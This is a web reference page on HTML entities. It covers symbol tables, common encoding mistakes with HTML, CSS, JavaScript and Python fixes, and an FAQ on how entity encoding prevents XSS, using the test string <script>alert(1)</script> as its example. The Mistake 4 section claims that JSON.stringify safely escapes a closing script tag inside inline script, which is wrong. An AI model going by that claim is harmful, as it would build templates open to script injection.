·&middot;&#183;Middle dot · interpunct
&bull;&#8226;Bullet point •
§&sect;&#167;Section sign § (legal documents)
&para;&#182;Pilcrow / paragraph sign ¶
&dagger;&#8224;Dagger † (footnote marker)
&Dagger;&#8225;Double dagger ‡ (footnote marker)

Mathematical Symbols

SymbolNamedNumericDescription
±&plusmn;&#177;Plus-minus ±
×&times;&#215;Multiplication ×
÷&divide;&#247;Division ÷
&asymp;&#8776;Approximately equal ≈
&ne;&#8800;Not equal ≠
&le;&#8804;Less-than or equal ≤
&ge;&#8805;Greater-than or equal ≥
&infin;&#8734;Infinity ∞
&radic;&#8730;Square root √
&sum;&#8721;Summation ∑
&prod;&#8719;Product ∏
&int;&#8747;Integral ∫
&empty;&#8709;Empty set ∅
&isin;&#8712;Element of ∈
&notin;&#8713;Not element of ∉
&cap;&#8745;Intersection ∩
&cup;&#8746;Union ∪
&sub;&#8834;Subset of ⊂
&sup;&#8835;Superset of ⊃
²&sup2;&#178;Superscript 2 (squared) ²
³&sup3;&#179;Superscript 3 (cubed) ³
¼&frac14;&#188;Vulgar fraction one quarter ¼
½&frac12;&#189;Vulgar fraction one half ½
¾&frac34;&#190;Vulgar fraction three quarters ¾

Arrows

ArrowNamedNumericDescription
&larr;&#8592;Leftwards arrow
&rarr;&#8594;Rightwards arrow
&uarr;&#8593;Upwards arrow
&darr;&#8595;Downwards arrow
&harr;&#8596;Left right arrow
&lArr;&#8656;Leftwards double arrow
&rArr;&#8658;Rightwards double arrow
&hArr;&#8660;Left right double arrow
&crarr;&#8629;Downwards arrow with corner leftwards (carriage return)

Common HTML Entity Mistakes and How to Fix Them

Mistake 1: Forgetting to Encode Ampersands in URLs

<!-- WRONG — the & breaks HTML validation and may confuse parsers --> <a href="https://example.com/api?foo=1&bar=2&baz=3">API Call</a> <!-- CORRECT — encode & as &amp; in HTML attribute values --> <a href="https://example.com/api?foo=1&amp;bar=2&amp;baz=3">API Call</a> <!-- Also wrong in meta refresh --> <meta http-equiv="refresh" content="0; url=https://example.com?a=1&b=2"> <!-- CORRECT --> <meta http-equiv="refresh" content="0; url=https://example.com?a=1&amp;b=2">

Mistake 2: Double Encoding

<!-- Double encoding happens when already-encoded text is encoded again --> <!-- Original text: Tom & Jerry --> <!-- After first encode: Tom &amp; Jerry --> <!-- After second encode: Tom &amp;amp; Jerry <-- WRONG, shows literally --> <!-- This often happens in templating chains where multiple layers encode the same variable --> <!-- Fix: ensure encoding happens exactly once per output context --> // JavaScript double encoding prevention function safeEncode(str) { // First decode any existing entities to avoid double encoding const decoded = new DOMParser() .parseFromString(str, 'text/html') .documentElement.textContent; // Then encode once return encodeHtml(decoded); } // Python double encoding prevention import html def safe_encode(text): # Decode first if the text might already be encoded decoded = html.unescape(text) # Then encode once return html.escape(decoded)

Mistake 3: Using HTML Entities in CSS content Values

/* WRONG — HTML entities in CSS are treated as literal text */ .arrow::before { content: '&rarr;'; } /* Shows: &rarr; */ .copy::after { content: '&copy;'; } /* Shows: &copy; */ /* CORRECT — use CSS Unicode escapes */ .arrow::before { content: '\2192'; } /* Shows: → */ .copy::after { content: '\00A9'; } /* Shows: © */ /* Or embed actual characters directly (UTF-8 CSS file) */ .arrow::before { content: '→'; } .copy::after { content: '©'; }

Mistake 4: Not Encoding in JavaScript Contexts

// HTML entities are NOT interpreted inside <script> tags // WRONG approach — thinking HTML encoding protects JS contexts // If a server template outputs: // <script>var name = "&lt;script&gt;alert(1)&lt;/script&gt;";</script> // The browser parses the JS string as the literal characters &lt;script&gt;... // which is still a string (not injected), but this approach is fragile. // The CORRECT approach: JSON-encode for JS contexts // <script>var name = <%= JSON.stringify(userInput) %>;</script> // => <script>var name = "<script>alert(1)</script>";</script> // The JSON-encoded string properly escapes the content for JS // Node.js example (Express + EJS) app.get('/profile', (req, res) => { res.render('profile', { // Pass raw data to template userName: req.user.name, // In EJS: <%= JSON.stringify(userName) %> for JS contexts // In EJS: <%- escapeXml(userName) %> for HTML contexts (auto-escaped with <%=) }); });

Mistake 5: Using &nbsp; for Visual Spacing

<!-- WRONG — using &nbsp; for visual indentation or spacing --> <p>&nbsp;&nbsp;&nbsp;Indented text</p> <p>First line<br>&nbsp;&nbsp;Second indented line</p> <td>&nbsp;&nbsp;&nbsp;Cell content</td> <!-- This is fragile, semantic nonsense, and accessibility nightmare --> <!-- CORRECT — use CSS for visual spacing --> <p style="text-indent: 2em;">Indented text</p> <p style="padding-left: 2em;">Second indented</p> <td style="padding-left: 1.5rem;">Cell content</td> <!-- &nbsp; has legitimate uses: --> <!-- 1. Prevent line break between related words --> <span>Dr.&nbsp;Smith</span> <!-- name won't wrap between title and name --> <span>100&nbsp;km/h</span> <!-- unit won't separate from number --> <td>No&nbsp;data</td> <!-- prevent "No" and "data" from splitting across lines --> <!-- 2. Keep an empty table cell from collapsing (legacy HTML) --> <td>&nbsp;</td> <!-- Modern alternative: CSS empty-cells or min-height -->

Frequently Asked Questions

What is an HTML entity?

An HTML entity is a string that begins with an ampersand (&) and ends with a semicolon (;), used to represent characters that have special meaning in HTML or that cannot be typed directly. For example, &amp;amp; renders as & and &amp;lt; renders as <. HTML entities exist in two forms: named entities (like &amp;copy; for the copyright symbol) and numeric entities (decimal like &amp;#169; or hexadecimal like &amp;#xA9;).

Why must I encode & < > " in HTML?

These four characters have special syntactic meaning in HTML. The ampersand (&) starts entity references and attribute values. The less-than sign (<) opens HTML tags. The greater-than sign (>) closes HTML tags. The double quote (") delimits attribute values. If you include these characters literally in HTML content or attributes without encoding them, the browser may misinterpret your HTML structure, causing rendering errors or security vulnerabilities.

What is the difference between named and numeric HTML entities?

Named entities use a mnemonic name (e.g., &amp;copy; for copyright, &amp;nbsp; for non-breaking space). Numeric entities use the Unicode code point in decimal (&amp;#169;) or hexadecimal (&amp;#xA9;). Named entities are more readable but only exist for a subset of characters. Numeric entities work for any Unicode character. Both forms are equally valid in all modern browsers.

Does &apos; work in HTML?

&apos; (apostrophe entity) was not part of the original HTML 4 specification but was added in HTML5 and XHTML. It is now universally supported in modern browsers. However, for maximum compatibility with older HTML parsers, many developers use the numeric form &#39; or simply the literal apostrophe character inside double-quoted attributes. In XHTML documents, &apos; has always been valid because XHTML is an XML application.

What is &nbsp; and when should I use it?

&nbsp; is a non-breaking space character (Unicode U+00A0). Unlike a regular space, it prevents the browser from inserting a line break at that position, and unlike regular spaces, consecutive &nbsp; characters are rendered (regular spaces collapse to one). Use &nbsp; sparingly: for units after numbers (e.g., 100&nbsp;km), to keep names together (e.g., Dr.&nbsp;Smith), or to prevent unwanted wrapping in table cells. Do not use it for layout spacing — use CSS margins and padding instead.

How does HTML entity encoding prevent XSS attacks?

Cross-Site Scripting (XSS) attacks inject malicious HTML or JavaScript into web pages. When user-supplied text is rendered in an HTML context, special characters like < > & " must be encoded as HTML entities before insertion. For example, the script tag <script>alert(1)</script> becomes harmless when the < and > are encoded as &amp;lt; and &amp;gt; — the browser displays it as literal text rather than executing it as HTML. Server-side frameworks handle this automatically when using template escaping, but raw innerHTML assignments in JavaScript bypass these protections.

What is the difference between HTML entity encoding and URL encoding?

HTML entity encoding converts characters using the &name; or &#code; format and is used for embedding text safely in HTML documents. URL encoding (percent encoding) converts characters using the %XX format and is used for encoding data in URIs. They serve different contexts: HTML entities go in HTML files and templates; URL encoding goes in URLs and query strings. A URL inside an HTML attribute often requires both — the URL portion is percent-encoded, and then the HTML attribute value is entity-encoded.

Which HTML entities are required vs optional?

Required: & must always be encoded as &amp;amp; in HTML text and attribute values. < must always be encoded as &amp;lt; in HTML text content. In HTML attribute values delimited by double quotes, " must be encoded as &amp;quot;. In HTML attribute values delimited by single quotes, apostrophes must be encoded as &amp;apos; or &amp;#39;. Optional but recommended: > can be used literally in most HTML text contexts but encoding as &amp;gt; avoids edge cases. All other characters are optional — modern browsers handle the full UTF-8 character set directly, so accented letters, emoji, and symbols can be used as-is when the document declares UTF-8 charset.

Related Tools

Related Guides

Try the HTML Entity Encoder/Decoder

Encode and decode HTML entities instantly. Supports named entities, decimal, and hexadecimal numeric entities.

Open HTML Entity Tool →
𝕏 Twitterin LinkedIn
この記事は役に立ちましたか?

最新情報を受け取る

毎週の開発ヒントと新ツール情報。

スパムなし。いつでも解除可能。

Try These Related Tools

&;HTML Entity Encoder%20URL Encoder/Decoder\Escape / Unescape

Related Articles

URL エンコーダ/デコーダ オンラインガイド:パーセントエンコーディング、RFC 3986、ベストプラクティス

URL エンコーディング(パーセントエンコーディング)の完全ガイド。RFC 3986、encodeURIComponent vs encodeURI、Python urllib.parse、Java URLEncoder、一般的なエンコード文字、フォームエンコーディング、API クエリパラメータ、二重エンコーディングのデバッグ。

Base64 エンコード・デコード オンラインガイド:JavaScript、Python、CLI

Base64 エンコード・デコードの完全ガイド。JavaScript (btoa/atob, Buffer)、Python、コマンドライン、Data URI、JWT、API 認証、URL安全な Base64。

HTML特殊文字&エンティティ:完全リファレンステーブル(2025)

完全なHTMLエンティティリファレンステーブル。シンボル、矢印、数学演算子、通貨記号の名前付き・数値文字参照。